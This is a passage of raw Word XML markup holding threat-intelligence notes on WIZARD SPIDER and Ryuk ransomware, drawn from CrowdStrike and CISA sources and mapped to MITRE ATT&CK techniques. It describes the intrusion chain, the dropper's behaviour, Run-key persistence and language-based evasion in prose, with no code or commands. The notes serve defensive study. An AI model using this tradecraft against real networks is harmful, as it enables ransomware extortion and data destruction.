      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “Enumerating domain admins with net group”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A2015" w14:textId="25132201" w:rsidR="00957B66" w:rsidRDefault="00CF04C1" w:rsidP="00957B66">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00957B66">
        <w:t xml:space="preserve">WIZARD SPIDER uses a module named NewBCtestnDll64 as a reverse SOCKS proxy that allows for the download and installation of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00957B66">
        <w:t>open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00957B66">
        <w:t xml:space="preserve"> PowerShell Empire post-exploitation framework. These services launch a Base64-encoded PowerShell script that will fetch the full PowerShell Empire code from a remote IP. Each instance of the Updater service connects to a single IP address, and multiple versions may be added at the same time, pointing to different IPs and requesting a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00957B66">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00957B66">
        <w:t xml:space="preserve"> resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654AC01" w14:textId="604C80B1" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:r>
        <w:t xml:space="preserve">[1] Through CrowdStrike IR engagements, WIZARD SPIDER has been observed performing the following events on the victim’s network, with the end goal of pushing out the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79575862" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>An obfuscated PowerShell script is executed and connects to a remote IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6A662" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>A reverse shell is downloaded and executed on the compromised host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989BDF6" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell anti-logging scripts are executed on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344987B2" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance of the network is conducted using standard Windows command line tools along with external uploaded tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E77EED" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Lateral movement throughout the network is enabled using Remote Desktop Protocol (RDP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCF39B" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Service User Accounts are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A7347" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell Empire is downloaded and installed as a service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC528D6" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Lateral movement is continued until privileges are recovered to obtain access to a domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC5C82" w14:textId="77777777" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PSEXEC is used to push out the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary to individual hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63901072" w14:textId="02D871FB" w:rsidR="00456E6D" w:rsidRDefault="00456E6D" w:rsidP="00456E6D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Batch scripts are executed to terminate processes/services and remove backups, followed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167A4FB2" w14:textId="77777777" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:r>
        <w:t xml:space="preserve">[1] In mid-August 2018, a modified version of Hermes, dubbed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, started appearing in a public malware repository. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks. These checks include querying the Process Environment Block (PEB) to see if the field is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeingDebugged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or querying the PEB to see if the field </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NtGlobalFlag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has been set; checking to see if the host is running VirtualBox by calling the instruction CPUID; and ensuring that the host language is not Russian, Ukrainian, or Belarusian. From a process and file perspective, Hermes and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target files in a similar fashion. The core differences are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> logic that handles file access, and the use of a second, embedded public RSA key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D503023" w14:textId="77777777" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1"/>
    <w:p w14:paraId="7B95B41F" w14:textId="489B430F" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The following are characteristics that have not changed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BF635" w14:textId="77777777" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypts files using RSA-2048 and AES-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66912D49" w14:textId="77777777" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Stores keys in the executable using the proprietary Microsoft SIMPLEBLOB format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A834825" w14:textId="77777777" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypts mounted devices and remote hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449952B8" w14:textId="2210A902" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Uses a file marker of HERMES to mark or check if a file has been encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35602F4F" w14:textId="46ACA625" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:r>
        <w:t xml:space="preserve">[1] There are two types of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binaries: a dropper (which is not commonly observed) and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executable payload. Recovery of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> droppers are rare, due to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executable payload deleting the dropper when executed. Upon execution, the dropper constructs an installation folder path. The folder path is created by calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetWindowsDirectoryW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then inserting a null byte at the fourth character of the path. This is used to create a string that contains the drive letter path. If the host operating system is Windows XP or earlier, the string Documents and Settings\Default User\ is appended to the drive letter path. If the host is Windows Vista or newer, the string </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>users\Public\ is appended to the drive letter path. For Windows XP, an example folder path would be C:\Documents and Settings\Default User\, and for Window Vista or higher, the path would be C:\Users\Public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7430759C" w14:textId="121A0500" w:rsidR="00BE60A1" w:rsidRDefault="00BE60A1" w:rsidP="00BE60A1">
      <w:r>
        <w:t>A random executable file name is then constructed. It is created by calling _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with a seed value returned from calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetTickCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, then _rand is continuously called until five alphabetic characters are concatenated together. The extension .exe is then appended. The dropper checks whether the host is 32-bit or 64-bit by calling IsWow64Process and writes one of two embedded payload executables corresponding to the host’s architecture. The newly written executable is then run by calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ShellExecuteW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload executable written by the dropper is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> component that contains the core logic for encrypting files on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E853B" w14:textId="79E7500F" w:rsidR="006E4803" w:rsidRPr="006F4F24" w:rsidRDefault="006E4803" w:rsidP="00BE60A1">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve">Current builds of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E4803">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve"> no longer contain persistence functionality. Previously, to remain persistent on the host, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E4803">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve"> created a registry entry under the Run key using Windows cmd.exe shell. The following command line was used to write to the Registry Run Key name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E4803">
        <w:t>svchos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E4803">
        <w:t>to  HKEY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve">_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value being the path to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E4803">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E4803">
        <w:t xml:space="preserve"> executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4E07E" w14:textId="2EBE5A25" w:rsidR="006F4F24" w:rsidRDefault="006F4F24" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09942D17" w14:textId="14696799" w:rsidR="006F4F24" w:rsidRDefault="00321F29" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ADDITIONAL INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B757C50" w14:textId="45452B1F" w:rsidR="00191F35" w:rsidRPr="00191F35" w:rsidRDefault="00191F35" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransom Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63655D" w14:textId="6A806A28" w:rsidR="001358D1" w:rsidRDefault="001358D1" w:rsidP="001358D1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> only used by Wizard Spider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE25F4D" w14:textId="0F86FAF0" w:rsidR="00FD1E15" w:rsidRDefault="00FD1E15" w:rsidP="00FD1E15">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specifically targets enterprise environments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D4DEA" w14:textId="0291A239" w:rsidR="00FD1E15" w:rsidRDefault="00FD1E15" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">Wizard Spider also uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trickbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="280927EB" w14:textId="79E06470" w:rsidR="00EC1493" w:rsidRPr="00EC1493" w:rsidRDefault="00EC1493" w:rsidP="00EC1493">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1493">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC1493">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1486 Data Encrypted for Impact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B04EF" w14:textId="33D208A9" w:rsidR="00191F35" w:rsidRPr="00191F35" w:rsidRDefault="00191F35" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00191F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00191F35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransomware is Distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7151E" w14:textId="77777777" w:rsidR="007B4064" w:rsidRDefault="007B4064" w:rsidP="001358D1">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4064">
        <w:t xml:space="preserve">nitial compromise is performed through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:t xml:space="preserve">, which is typically distributed either </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C865DB7" w14:textId="725DF5A2" w:rsidR="001358D1" w:rsidRDefault="007B4064" w:rsidP="001358D1">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4064">
        <w:t>ia spam email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD16FD" w14:textId="6DB16276" w:rsidR="00E978CC" w:rsidRDefault="00E978CC" w:rsidP="001358D1">
      <w:r w:rsidRPr="007B4064">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="007B4064" w:rsidRPr="007B4064">
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A53C4B" w14:textId="7712DCCA" w:rsidR="007B4064" w:rsidRDefault="007B4064" w:rsidP="001358D1">
      <w:r w:rsidRPr="007B4064">
        <w:t xml:space="preserve">through the use of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:t>Emotet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:t xml:space="preserve"> (developed and operated by MUMMY SPIDER) geo-based download function</w:t>
      </w:r>
      <w:r w:rsidR="00B00488">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B00488">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00B00488" w:rsidRPr="00B00488">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B00488" w:rsidRPr="00B00488">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r w:rsidR="00B00488">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65248D" w14:textId="7036F353" w:rsidR="00E978CC" w:rsidRPr="00C2543D" w:rsidRDefault="00C2543D" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2543D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Criminal Actors Operating from Russia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E8E17" w14:textId="77777777" w:rsidR="002831DD" w:rsidRDefault="002831DD" w:rsidP="001358D1">
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve">To check the host language, it queries the registry </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002831DD">
        <w:t>KEY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>_LOCAL_MACHINE\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002831DD">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>Nls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve">\Language\ and the value </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>InstallLanguage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve">. If the machine has the value 0419 (Russian), 0422 (Ukrainian) or 0423 (Belarusian), it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>call</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002831DD">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002831DD">
        <w:t xml:space="preserve"> to stop executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DD095" w14:textId="4F6CDF84" w:rsidR="00B00488" w:rsidRDefault="002831DD" w:rsidP="001358D1">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C2543D" w:rsidRPr="002831DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C2543D" w:rsidRPr="002831DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1012 </w:t>
      </w:r>
      <w:r w:rsidRPr="002831DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query Registry </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7BD5F" w14:textId="6FB8A6FF" w:rsidR="00A91F70" w:rsidRDefault="00A91F70" w:rsidP="001358D1"/>
    <w:p w14:paraId="19EB7B67" w14:textId="68475F1F" w:rsidR="00A91F70" w:rsidRDefault="00691E0D" w:rsidP="001358D1">
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidR="00A91F70">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ransomware Activity Targeting the Healthcare and Public Health Sector | CISA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17EEADBF" w14:textId="17C2B645" w:rsidR="00A96123" w:rsidRDefault="00A96123" w:rsidP="001358D1">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96123">
        <w:t xml:space="preserve">Cybercriminals disseminate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96123">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96123">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96123">
        <w:t>BazarLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96123">
        <w:t xml:space="preserve"> via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine. </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D73488" w14:textId="35692F85" w:rsidR="00A96123" w:rsidRDefault="00A96123" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50BEC3" w14:textId="3D74C2DB" w:rsidR="00A96123" w:rsidRDefault="00A96123" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
